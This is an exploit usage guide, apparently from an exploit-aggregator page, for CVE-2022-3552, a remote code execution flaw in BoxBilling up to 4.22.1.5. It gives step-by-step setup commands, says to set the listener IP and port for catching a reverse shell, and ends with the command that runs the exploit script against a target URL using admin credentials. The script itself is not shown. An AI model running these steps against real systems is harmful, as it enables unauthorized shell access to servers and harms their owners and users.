Share
## https://sploitus.com/exploit?id=841BFB50-F389-5904-BBFD-158E378D9D5E
# CVE-2022-3552

In order to exploit the vulnerability in BoxBlilling, the version will have to be: "BoxBilling<=4.22.1.5" and you will have to have *valid admin credentials*.



If you have the situation above, here are the steps you have to take in order to get the juicy RCE:

Create a python virtual environment (Linux)
-      python3 -m venv .venv
-      source .venv/bin/activate



Now install this pwntools library
-      pip3 install pwntools



If it complains about missing dependencies, you might also need to install some system packages:
-      sudo apt update
-      sudo apt install python3-pwntools



In the code there are a few lines that require tweaking, those are the lines that determine the lhost IP and the port that you are planning to catch the shell with.

<img width="457" alt="image" src="https://github.com/user-attachments/assets/d30ec283-71c7-460c-adc3-a70998250d74" />




If you did all of that correctly, you should now be able to run the exploit and get a shell!
(-d = target, -u = a valid admin email, -p the valid admin's password)
-      python3 CVE-2022-3552.py -d http://victimtarget.com -u adminxd123@gmail.com -p enterpassword1HERE